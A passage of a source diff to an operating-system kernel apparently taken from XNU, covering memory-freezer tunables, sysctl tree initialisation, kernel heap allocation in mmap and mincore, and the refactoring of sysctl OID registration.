+                        * Both counts are using relaxed atomics & could be out of sync
+                        * causing us to see thaw_percentage > 100.
+                        */
+                       thaw_percentage = 100;
+               } else {
+                       thaw_percentage = (int)(100 * thaw_count / frozen_count);
+               }
        }
        return sysctl_handle_int(oidp, &thaw_percentage, 0, req);
 }
@@ -313,16 +255,28 @@ SYSCTL_PROC(_kern, OID_AUTO, memorystatus_freezer_thaw_percentage, CTLTYPE_INT |
 
 #define FREEZER_ERROR_STRING_LENGTH 128
 
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_pages_min, &memorystatus_freeze_pages_min, 0, UINT32_MAX, "");
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_pages_max, &memorystatus_freeze_pages_max, 0, UINT32_MAX, "");
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_processes_max, &memorystatus_frozen_processes_max, 0, UINT32_MAX, "");
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_jetsam_band, &memorystatus_freeze_jetsam_band, JETSAM_PRIORITY_IDLE, JETSAM_PRIORITY_MAX - 1, "");
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_private_shared_pages_ratio, &memorystatus_freeze_private_shared_pages_ratio, 0, UINT32_MAX, "");
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_min_processes, &memorystatus_freeze_suspended_threshold, 0, UINT32_MAX, "");
+/*
+ * max. # of frozen process demotions we will allow in our daily cycle.
+ */
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_max_freeze_demotions_daily, &memorystatus_max_frozen_demotions_daily, 0, UINT32_MAX, "");
+
+/*
+ * min # of thaws needed by a process to protect it from getting demoted into the IDLE band.
+ */
+EXPERIMENT_FACTOR_UINT(_kern, memorystatus_thaw_count_demotion_threshold, &memorystatus_thaw_count_demotion_threshold, 0, UINT32_MAX, "");
+
 #if DEVELOPMENT || DEBUG
 
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_jetsam_band, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_jetsam_band, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_daily_mb_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_daily_mb_max, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_degraded_mode, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_freeze_degradation, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_threshold, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_threshold, 0, "");
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_pages_min, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_pages_min, 0, "");
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_pages_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_pages_max, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_refreeze_eligible_count, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_refreeze_eligible_count, 0, "");
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_processes_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_frozen_processes_max, 0, "");
 
 /*
  * Max. shared-anonymous memory in MB that can be held by frozen processes in the high jetsam band.
@@ -334,18 +288,6 @@ SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_shared_mb_max, CTLFLAG_RW | CTL
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_shared_mb, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_frozen_shared_mb, 0, "");
 
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_shared_mb_per_process_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_shared_mb_per_process_max, 0, "");
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_private_shared_pages_ratio, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_private_shared_pages_ratio, 0, "");
-
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_min_processes, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_suspended_threshold, 0, "");
-
-/*
- * max. # of frozen process demotions we will allow in our daily cycle.
- */
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_max_freeze_demotions_daily, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_max_frozen_demotions_daily, 0, "");
-/*
- * min # of thaws needed by a process to protect it from getting demoted into the IDLE band.
- */
-SYSCTL_UINT(_kern, OID_AUTO, memorystatus_thaw_count_demotion_threshold, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_thaw_count_demotion_threshold, 0, "");
 
 boolean_t memorystatus_freeze_throttle_enabled = TRUE;
 SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_throttle_enabled, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_throttle_enabled, 0, "");
@@ -462,6 +404,7 @@ again:
                                p->p_memstat_state |= P_MEMSTAT_FROZEN;
                                p->p_memstat_freeze_skip_reason = kMemorystatusFreezeSkipReasonNone;
                                memorystatus_frozen_count++;
+                               os_atomic_inc(&memorystatus_freezer_stats.mfs_processes_frozen, relaxed);
                                if (memorystatus_frozen_count == memorystatus_frozen_processes_max) {
                                        memorystatus_freeze_out_of_slots();
                                }
@@ -811,7 +754,7 @@ continue_eval:
                                for (j = 0; j < entry_count; j++) {
                                        if (strncmp(memorystatus_global_probabilities_table[j].proc_name,
                                            p->p_name,
-                                           MAXCOMLEN + 1) == 0) {
+                                           MAXCOMLEN) == 0) {
                                                probability_of_use = memorystatus_global_probabilities_table[j].use_probability;
                                                break;
                                        }
@@ -1176,11 +1119,6 @@ memorystatus_freeze_init(void)
        kern_return_t result;
        thread_t thread;
 
-       freezer_lck_grp_attr = lck_grp_attr_alloc_init();
-       freezer_lck_grp = lck_grp_alloc_init("freezer", freezer_lck_grp_attr);
-
-       lck_mtx_init(&freezer_mutex, freezer_lck_grp, NULL);
-
        /*
         * This is just the default value if the underlying
         * storage device doesn't have any specific budget.
@@ -1208,7 +1146,7 @@ memorystatus_is_process_eligible_for_freeze(proc_t p)
         * Called with proc_list_lock held.
         */
 
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
 
        boolean_t should_freeze = FALSE;
        uint32_t state = 0, pages = 0;
@@ -1332,9 +1270,15 @@ memorystatus_is_process_eligible_for_freeze(proc_t p)
 
        if (entry_count) {
                for (i = 0; i < entry_count; i++) {
+                       /*
+                        * NB: memorystatus_internal_probabilities.proc_name is MAXCOMLEN + 1 bytes
+                        * proc_t.p_name is 2*MAXCOMLEN + 1 bytes. So we only compare the first
+                        * MAXCOMLEN bytes here since the name in the probabilities table could
+                        * be truncated from the proc_t's p_name.
+                        */
                        if (strncmp(memorystatus_global_probabilities_table[i].proc_name,
                            p->p_name,
-                           MAXCOMLEN + 1) == 0) {
+                           MAXCOMLEN) == 0) {
                                probability_of_use = memorystatus_global_probabilities_table[i].use_probability;
                                break;
                        }
@@ -1475,6 +1419,7 @@ memorystatus_freeze_process_sync(proc_t p)
                                p->p_memstat_state |= P_MEMSTAT_FROZEN;
                                p->p_memstat_freeze_skip_reason = kMemorystatusFreezeSkipReasonNone;
                                memorystatus_frozen_count++;
+                               os_atomic_inc(&memorystatus_freezer_stats.mfs_processes_frozen, relaxed);
                                if (memorystatus_frozen_count == memorystatus_frozen_processes_max) {
                                        memorystatus_freeze_out_of_slots();
                                }
@@ -1719,6 +1664,7 @@ freeze_process:
                                p->p_memstat_state |= P_MEMSTAT_FROZEN;
                                p->p_memstat_freeze_skip_reason = kMemorystatusFreezeSkipReasonNone;
                                memorystatus_frozen_count++;
+                               os_atomic_inc(&memorystatus_freezer_stats.mfs_processes_frozen, relaxed);
                                if (memorystatus_frozen_count == memorystatus_frozen_processes_max) {
                                        memorystatus_freeze_out_of_slots();
                                }
@@ -1863,7 +1809,7 @@ freeze_process:
                        } else {
                                p->p_memstat_state |= P_MEMSTAT_FREEZE_IGNORE;
                        }
-                       memorystatus_freeze_handle_error(p, p->p_memstat_state & P_MEMSTAT_FROZEN, freezer_error_code, aPid, coal, "memorystatus_freeze_top_process");
+                       memorystatus_freeze_handle_error(p, freezer_error_code, p->p_memstat_state & P_MEMSTAT_FROZEN, aPid, coal, "memorystatus_freeze_top_process");
 
                        proc_rele_locked(p);
 
@@ -1899,6 +1845,33 @@ freeze_process:
        return ret;
 }
 
+#if DEVELOPMENT || DEBUG
+/* For testing memorystatus_freeze_top_process */
+static int
+sysctl_memorystatus_freeze_top_process SYSCTL_HANDLER_ARGS
+{
+#pragma unused(arg1, arg2)
+       int error, val;
+       /*
+        * Only freeze on write to prevent freezing during `sysctl -a`.
+        * The actual value written doesn't matter.
+        */
+       error = sysctl_handle_int(oidp, &val, 0, req);
+       if (error || !req->newptr) {
+               return error;
+       }
+       lck_mtx_lock(&freezer_mutex);
+       int ret = memorystatus_freeze_top_process();
+       lck_mtx_unlock(&freezer_mutex);
+       if (ret == -1) {
+               ret = ESRCH;
+       }
+       return ret;
+}
+SYSCTL_PROC(_vm, OID_AUTO, memorystatus_freeze_top_process, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED,
+    0, 0, &sysctl_memorystatus_freeze_top_process, "I", "");
+#endif /* DEVELOPMENT || DEBUG */
+
 static inline boolean_t
 memorystatus_can_freeze_processes(void)
 {
@@ -2146,7 +2119,7 @@ static void
 memorystatus_freeze_mark_eligible_processes_with_skip_reason(memorystatus_freeze_skip_reason_t reason, bool locked)
 {
        LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED);
-       LCK_MTX_ASSERT(proc_list_mlock, locked ? LCK_MTX_ASSERT_OWNED : LCK_MTX_ASSERT_NOTOWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, locked ? LCK_MTX_ASSERT_OWNED : LCK_MTX_ASSERT_NOTOWNED);
        unsigned int band = JETSAM_PRIORITY_IDLE;
        proc_t p;
 
@@ -2225,7 +2198,7 @@ static void
 memorystatus_freeze_start_normal_throttle_interval(uint32_t new_budget, mach_timespec_t start_ts)
 {
        LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED);
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
 
        normal_throttle_window->max_pageouts = new_budget;
        normal_throttle_window->ts.tv_sec = normal_throttle_window->mins * 60;
@@ -2239,6 +2212,13 @@ memorystatus_freeze_start_normal_throttle_interval(uint32_t new_budget, mach_tim
        }
        /* Ensure the normal window is now active. */
        memorystatus_freeze_degradation = FALSE;
+       memorystatus_freezer_stats.mfs_shared_pages_skipped = 0;
+       /*
+        * Reset the thawed percentage to 0 so we re-evaluate in the new interval.
+        */
+       os_atomic_store(&memorystatus_freezer_stats.mfs_processes_thawed, 0, release);
+       os_atomic_store(&memorystatus_freezer_stats.mfs_processes_frozen, memorystatus_frozen_count, release);
+       os_atomic_inc(&memorystatus_freeze_current_interval, release);
 }
 
 #if DEVELOPMENT || DEBUG
@@ -2273,7 +2253,7 @@ static void
 memorystatus_freeze_out_of_budget(const struct throttle_interval_t *interval)
 {
        LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED);
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
 
        mach_timespec_t time_left = {0, 0};
        mach_timespec_t now_ts;
@@ -2302,7 +2282,7 @@ static void
 memorystatus_freeze_out_of_slots(void)
 {
        LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED);
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
        assert(memorystatus_frozen_count == memorystatus_frozen_processes_max);
 
        os_log(OS_LOG_DEFAULT,
@@ -2338,7 +2318,7 @@ memorystatus_freeze_update_throttle(uint64_t *budget_pages_allowed)
        clock_nsec_t nsec;
        mach_timespec_t now_ts;
        LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED);
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
 
        unsigned int freeze_daily_pageouts_max = 0;
        uint32_t budget_rollover = 0;
@@ -2386,7 +2366,6 @@ memorystatus_freeze_update_throttle(uint64_t *budget_pages_allowed)
                            interval->mins, budget_rollover),
                    now_ts);
                *budget_pages_allowed = interval->max_pageouts;
-               memorystatus_freezer_stats.mfs_shared_pages_skipped = 0;
 
                memorystatus_demote_frozen_processes(FALSE); /* normal mode...don't force a demotion */
        } else {
index 85ffba28d6ec0b39815b097a18db722418162c7e..691e117328592982693bcc0ccb595caecfd56be8 100644 (file)
@@ -140,7 +140,7 @@ static int      cputhreadtype, cpu64bit;
 static uint64_t cacheconfig[10], cachesize[10];
 static int      packages;
 
-static char *   osenvironment;
+static char *   osenvironment = NULL;
 static uint32_t osenvironment_size = 0;
 static int      osenvironment_initialized = 0;
 
@@ -152,21 +152,21 @@ static struct {
        uint32_t use_recovery_securityd:1;
 } property_existence = {0, 0};
 
-SYSCTL_NODE(, 0, sysctl, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, 0, sysctl, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "Sysctl internal magic");
-SYSCTL_NODE(, CTL_KERN, kern, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, CTL_KERN, kern, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "High kernel, proc, limits &c");
-SYSCTL_NODE(, CTL_VM, vm, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, CTL_VM, vm, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "Virtual memory");
-SYSCTL_NODE(, CTL_VFS, vfs, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, CTL_VFS, vfs, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "File system");
-SYSCTL_NODE(, CTL_NET, net, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, CTL_NET, net, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "Network, (see socket.h)");
-SYSCTL_NODE(, CTL_DEBUG, debug, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, CTL_DEBUG, debug, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "Debugging");
 SYSCTL_NODE(, CTL_HW, hw, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "hardware");
-SYSCTL_NODE(, CTL_MACHDEP, machdep, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(, CTL_MACHDEP, machdep, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "machine dependent");
 SYSCTL_NODE(, CTL_USER, user, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "user-level");
@@ -475,11 +475,14 @@ sysctl_tbfrequency
        return sysctl_io_number(req, l, sizeof(l), NULL, NULL);
 }
 
+/*
+ * Called by IOKit on Intel, or by sysctl_load_devicetree_entries()
+ */
 void
 sysctl_set_osenvironment(unsigned int size, const void* value)
 {
        if (osenvironment_size == 0 && size > 0) {
-               MALLOC(osenvironment, char *, size, M_TEMP, M_WAITOK);
+               osenvironment = zalloc_permanent(size, ZALIGN_NONE);
                if (osenvironment) {
                        memcpy(osenvironment, value, size);
                        osenvironment_size = size;
@@ -501,7 +504,8 @@ sysctl_unblock_osenvironment(void)
  * PE_init_iokit(). Doing this also avoids the extern-C hackery to access these entries
  * from IORegistry (which requires C++).
  */
-void
+__startup_func
+static void
 sysctl_load_devicetree_entries(void)
 {
        DTEntry chosen;
@@ -514,11 +518,7 @@ sysctl_load_devicetree_entries(void)
 
        /* load osenvironment */
        if (kSuccess == SecureDTGetProperty(chosen, "osenvironment", (void const **) &value, &size)) {
-               MALLOC(osenvironment, char *, size, M_TEMP, M_WAITOK);
-               if (osenvironment) {
-                       memcpy(osenvironment, value, size);
-                       osenvironment_size = size;
-               }
+               sysctl_set_osenvironment(size, value);
        }
 
        /* load ephemeral_storage */
@@ -537,6 +537,7 @@ sysctl_load_devicetree_entries(void)
                }
        }
 }
+STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, sysctl_load_devicetree_entries);
 
 static int
 sysctl_osenvironment
@@ -745,7 +746,7 @@ SYSCTL_INT(_hw_optional, OID_AUTO, floatingpoint, CTLFLAG_RD | CTLFLAG_KERN | CT
 /*
  * Optional device hardware features can be registered by drivers below hw.features
  */
-SYSCTL_NODE(_hw, OID_AUTO, features, CTLFLAG_RD | CTLFLAG_LOCKED, NULL, "hardware features");
+SYSCTL_EXTENSIBLE_NODE(_hw, OID_AUTO, features, CTLFLAG_RD | CTLFLAG_LOCKED, NULL, "hardware features");
 
 /*
  * Deprecated variables.  These are supported for backwards compatibility
@@ -912,7 +913,6 @@ SYSCTL_INT(_hw_optional, OID_AUTO, arm64, CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LO
 void
 sysctl_mib_init(void)
 {
-       cputhreadtype = cpu_threadtype();
 #if defined(__i386__) || defined (__x86_64__)
        cpu64bit = (_get_cpu_capabilities() & k64Bit) == k64Bit;
 #elif defined(__arm__) || defined (__arm64__)
@@ -921,18 +921,6 @@ sysctl_mib_init(void)
 #error Unsupported arch
 #endif
 
-       /*
-        * Populate the optional portion of the hw.* MIB.
-        *
-        * XXX This could be broken out into parts of the code
-        *     that actually directly relate to the functions in
-        *     question.
-        */
-
-       if (cputhreadtype != CPU_THREADTYPE_NONE) {
-               sysctl_register_oid(&sysctl__hw_cputhreadtype);
-       }
-
 #if defined (__i386__) || defined (__x86_64__)
        /* hw.cacheconfig */
        cacheconfig[0] = ml_cpu_cache_sharing(0);
@@ -976,8 +964,28 @@ sysctl_mib_init(void)
        cachesize[4] = 0;
 
        packages = 1;
-
 #else
 #error unknown architecture
 #endif /* !__i386__ && !__x86_64 && !__arm__ && !__arm64__ */
 }
+
+__startup_func
+static void
+sysctl_mib_startup(void)
+{
+       cputhreadtype = cpu_threadtype();
+
+       /*
+        * Populate the optional portion of the hw.* MIB.
+        *
+        * XXX This could be broken out into parts of the code
+        *     that actually directly relate to the functions in
+        *     question.
+        */
+
+       if (cputhreadtype != CPU_THREADTYPE_NONE) {
+               sysctl_register_oid_early(&sysctl__hw_cputhreadtype);
+       }
+
+}
+STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, sysctl_mib_startup);
index 9e9e8f8f26fe46b18d27079232e314373383cfbb..0cc17e529abaec1db52d89ed72ae1ba9aa049f6d 100644 (file)
@@ -273,7 +273,7 @@ mmap(proc_t p, struct mmap_args *uap, user_addr_t *retval)
 
 
        /* make sure mapping fits into numeric range etc */
-       if (os_add3_overflow(file_pos, user_size, PAGE_SIZE_64 - 1, &sum)) {
+       if (os_add3_overflow(file_pos, user_size, vm_map_page_size(user_map) - 1, &sum)) {
                return EINVAL;
        }
 
@@ -850,10 +850,10 @@ bad:
        }
 
        KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_SC_EXTENDED_INFO, SYS_mmap) | DBG_FUNC_NONE), fd, (uint32_t)(*retval), (uint32_t)user_size, error, 0);
-#ifndef CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_SC_EXTENDED_INFO2, SYS_mmap) | DBG_FUNC_NONE), (uint32_t)(*retval >> 32), (uint32_t)(user_size >> 32),
            (uint32_t)(file_pos >> 32), (uint32_t)file_pos, 0);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
        return error;
 }
 
@@ -877,9 +877,9 @@ msync_nocancel(__unused proc_t p, struct msync_nocancel_args *uap, __unused int3
        user_map = current_map();
        addr = (mach_vm_offset_t) uap->addr;
        size = (mach_vm_size_t) uap->len;
-#ifndef CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_SC_EXTENDED_INFO, SYS_msync) | DBG_FUNC_NONE), (uint32_t)(addr >> 32), (uint32_t)(size >> 32), 0, 0, 0);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
        if (mach_vm_range_overflows(addr, size)) {
                return EINVAL;
        }
@@ -1272,8 +1272,9 @@ mincore(__unused proc_t p, struct mincore_args *uap, __unused int32_t *retval)
 
        req_vec_size_pages = (end - addr) >> effective_page_shift;
        cur_vec_size_pages = MIN(req_vec_size_pages, (MAX_PAGE_RANGE_QUERY >> effective_page_shift));
+       size_t kernel_vec_size = cur_vec_size_pages;
 
-       kernel_vec = (void*) _MALLOC(cur_vec_size_pages * sizeof(char), M_TEMP, M_WAITOK | M_ZERO);
+       kernel_vec = kheap_alloc(KHEAP_TEMP, kernel_vec_size, Z_WAITOK | Z_ZERO);
 
        if (kernel_vec == NULL) {
                return ENOMEM;
@@ -1285,10 +1286,11 @@ mincore(__unused proc_t p, struct mincore_args *uap, __unused int32_t *retval)
        vec = uap->vec;
 
        pqueryinfo_vec_size = cur_vec_size_pages * sizeof(struct vm_page_info_basic);
-       info = (void*) _MALLOC(pqueryinfo_vec_size, M_TEMP, M_WAITOK);
+
+       info = kheap_alloc(KHEAP_TEMP, pqueryinfo_vec_size, Z_WAITOK);
 
        if (info == NULL) {
-               FREE(kernel_vec, M_TEMP);
+               kheap_free(KHEAP_TEMP, kernel_vec, kernel_vec_size);
                return ENOMEM;
        }
 
@@ -1366,8 +1368,8 @@ mincore(__unused proc_t p, struct mincore_args *uap, __unused int32_t *retval)
                first_addr = addr;
        }
 
-       FREE(kernel_vec, M_TEMP);
-       FREE(info, M_TEMP);
+       kheap_free(KHEAP_TEMP, info, pqueryinfo_vec_size);
+       kheap_free(KHEAP_TEMP, kernel_vec, kernel_vec_size);
 
        if (error) {
                return EFAULT;
index b6765a202db9313f25400dbcf343d5d595055c66..481e11cbd35efb742e8f2e8df873e5177fb3acdd 100644 (file)
@@ -67,6 +67,7 @@
  */
 
 
+#include <kern/counter.h>
 #include <sys/param.h>
 #include <sys/buf.h>
 #include <sys/kernel.h>
 #include <sys/systm.h>
 #include <sys/sysproto.h>
 
+#include <os/atomic_private.h>
+
 #include <security/audit/audit.h>
 #include <pexpert/pexpert.h>
 
+#include <IOKit/IOBSD.h>
+
 #if CONFIG_MACF
 #include <security/mac_framework.h>
 #endif
@@ -89,9 +94,9 @@
 #include <ptrauth.h>
 #endif /* defined(HAS_APPLE_PAC) */
 
-lck_grp_t * sysctl_lock_group = NULL;
-lck_rw_t * sysctl_geometry_lock = NULL;
-lck_mtx_t * sysctl_unlocked_node_lock = NULL;
+static LCK_GRP_DECLARE(sysctl_lock_group, "sysctl");
+static LCK_RW_DECLARE(sysctl_geometry_lock, &sysctl_lock_group);
+static LCK_MTX_DECLARE(sysctl_unlocked_node_lock, &sysctl_lock_group);
 
 /*
  * Conditionally allow dtrace to see these functions for debugging purposes.
@@ -135,7 +140,8 @@ int     userland_sysctl(boolean_t string_is_canonical,
     int *name, u_int namelen, struct sysctl_req *req,
     size_t *retval);
 
-struct sysctl_oid_list sysctl__children; /* root list */
+SECURITY_READ_ONLY_LATE(struct sysctl_oid_list) sysctl__children; /* root list */
+__SYSCTL_EXTENSION_NODE();
 
 /*
  * Initialization of the MIB tree.
@@ -143,14 +149,104 @@ struct sysctl_oid_list sysctl__children; /* root list */
  * Order by number in each list.
  */
 
+static void
+sysctl_register_oid_locked(struct sysctl_oid *new_oidp,
+    struct sysctl_oid *oidp)
+{
+       struct sysctl_oid_list *parent = new_oidp->oid_parent;
+       struct sysctl_oid_list *parent_rw = NULL;
+       struct sysctl_oid *p, **prevp;
+
+       p = SLIST_FIRST(parent);
+       if (p && p->oid_number == OID_MUTABLE_ANCHOR) {
+               parent_rw = p->oid_arg1;
+       }
+
+       if (oidp->oid_number == OID_AUTO) {
+               int n = OID_AUTO_START;
+
+               /*
+                * If this oid has a number OID_AUTO, give it a number which
+                * is greater than any current oid.  Make sure it is at least
+                * OID_AUTO_START to leave space for pre-assigned oid numbers.
+                */
+
+               SLIST_FOREACH_PREVPTR(p, prevp, parent, oid_link) {
+                       if (p->oid_number >= n) {
+                               n = p->oid_number + 1;
+                       }
+               }
+
+               if (parent_rw) {
+                       SLIST_FOREACH_PREVPTR(p, prevp, parent_rw, oid_link) {
+                               if (p->oid_number >= n) {
+                                       n = p->oid_number + 1;
+                               }
+                       }
+               }
+
+               /*
+                * Reflect the number in an allocated OID into the template
+                * of the caller for sysctl_unregister_oid() compares.
+                */
+               oidp->oid_number = new_oidp->oid_number = n;
+       } else {
+               /*
+                * Insert the oid into the parent's list in order.
+                */
+               SLIST_FOREACH_PREVPTR(p, prevp, parent, oid_link) {
+                       if (oidp->oid_number == p->oid_number) {
+                               panic("attempting to register a sysctl at previously registered slot : %d",
+                                   oidp->oid_number);
+                       } else if (oidp->oid_number < p->oid_number) {
+                               break;
+                       }
+               }
+
+               if (parent_rw) {
+                       SLIST_FOREACH_PREVPTR(p, prevp, parent_rw, oid_link) {
+                               if (oidp->oid_number == p->oid_number) {
+                                       panic("attempting to register a sysctl at previously registered slot : %d",
+                                           oidp->oid_number);
+                               } else if (oidp->oid_number < p->oid_number) {
+                                       break;
+                               }
+                       }
+               }
+       }
+
+#if defined(HAS_APPLE_PAC)
+       if (oidp->oid_handler) {
+               /*
+                * Sign oid_handler address-discriminated upon installation to make it
+                * harder to replace with an arbitrary function pointer.  Blend with
+                * a hash of oid_arg1 for robustness against memory corruption.
+                */
+               oidp->oid_handler = ptrauth_auth_and_resign(oidp->oid_handler,
+                   ptrauth_key_function_pointer,
+                   ptrauth_function_pointer_type_discriminator(typeof(oidp->oid_handler)),
+                   ptrauth_key_function_pointer,
+                   ptrauth_blend_discriminator(&oidp->oid_handler,
+                   os_hash_kernel_pointer(oidp->oid_arg1)));
+       }
+#endif /* defined(HAS_APPLE_PAC) */
+
+       SLIST_NEXT(oidp, oid_link) = *prevp;
+       *prevp = oidp;
+}
+
 void
 sysctl_register_oid(struct sysctl_oid *new_oidp)
 {
-       struct sysctl_oid *oidp = NULL;
-       struct sysctl_oid_list *parent = new_oidp->oid_parent;
-       struct sysctl_oid *p;
-       struct sysctl_oid *q;
-       int n;
+       struct sysctl_oid *oidp;
+
+       if (new_oidp->oid_number < OID_AUTO) {
+               panic("trying to register a node %p with an invalid oid_number: %d",
+                   new_oidp, new_oidp->oid_number);
+       }
+       if (new_oidp->oid_kind & CTLFLAG_PERMANENT) {
+               panic("Use sysctl_register_oid_early to register permanent nodes");
+       }
 
        /*
         * The OID can be old-style (needs copy), new style without an earlier
@@ -161,10 +257,11 @@ sysctl_register_oid(struct sysctl_oid *new_oidp)
        if (!(new_oidp->oid_kind & CTLFLAG_OID2)) {
 #if __x86_64__
                /*
-                * XXX: M_TEMP is perhaps not the most apropriate zone, as it
+                * XXX: KHEAP_DEFAULT is perhaps not the most apropriate zone, as it
                 * XXX: will subject us to use-after-free by other consumers.
                 */
-               MALLOC(oidp, struct sysctl_oid *, sizeof(*oidp), M_TEMP, M_WAITOK | M_ZERO);
+               oidp = kheap_alloc(KHEAP_DEFAULT, sizeof(struct sysctl_oid),
+                   Z_WAITOK | Z_ZERO);
                if (oidp == NULL) {
                        return;         /* reject: no memory */
                }
@@ -175,7 +272,7 @@ sysctl_register_oid(struct sysctl_oid *new_oidp)
                 * Note:        We may want to set the oid_descr to the
                 *              oid_name (or "") at some future date.
                 */
-               *oidp = *new_oidp;
+               memcpy(oidp, new_oidp, offsetof(struct sysctl_oid, oid_descr));
 #else
                panic("Old style sysctl without a version number isn't supported");
 #endif
@@ -191,68 +288,30 @@ sysctl_register_oid(struct sysctl_oid *new_oidp)
                }
        }
 
-       /* Get the write lock to modify the geometry */
-       lck_rw_lock_exclusive(sysctl_geometry_lock);
-
-       /*
-        * If this oid has a number OID_AUTO, give it a number which
-        * is greater than any current oid.  Make sure it is at least
-        * OID_AUTO_START to leave space for pre-assigned oid numbers.
-        */
-       if (oidp->oid_number == OID_AUTO) {
-               /* First, find the highest oid in the parent list >OID_AUTO_START-1 */
-               n = OID_AUTO_START;
-               SLIST_FOREACH(p, parent, oid_link) {
-                       if (p->oid_number > n) {
-                               n = p->oid_number;
-                       }
-               }
-               oidp->oid_number = n + 1;
-               /*
-                * Reflect the number in an llocated OID into the template
-                * of the caller for sysctl_unregister_oid() compares.
-                */
-               if (oidp != new_oidp) {
-                       new_oidp->oid_number = oidp->oid_number;
-               }
-       }
+       lck_rw_lock_exclusive(&sysctl_geometry_lock);
+       sysctl_register_oid_locked(new_oidp, oidp);
+       lck_rw_unlock_exclusive(&sysctl_geometry_lock);
+}
 
-#if defined(HAS_APPLE_PAC)
-       if (oidp->oid_handler) {
-               /*
-                * Sign oid_handler address-discriminated upon installation to make it
-                * harder to replace with an arbitrary function pointer.  Blend with
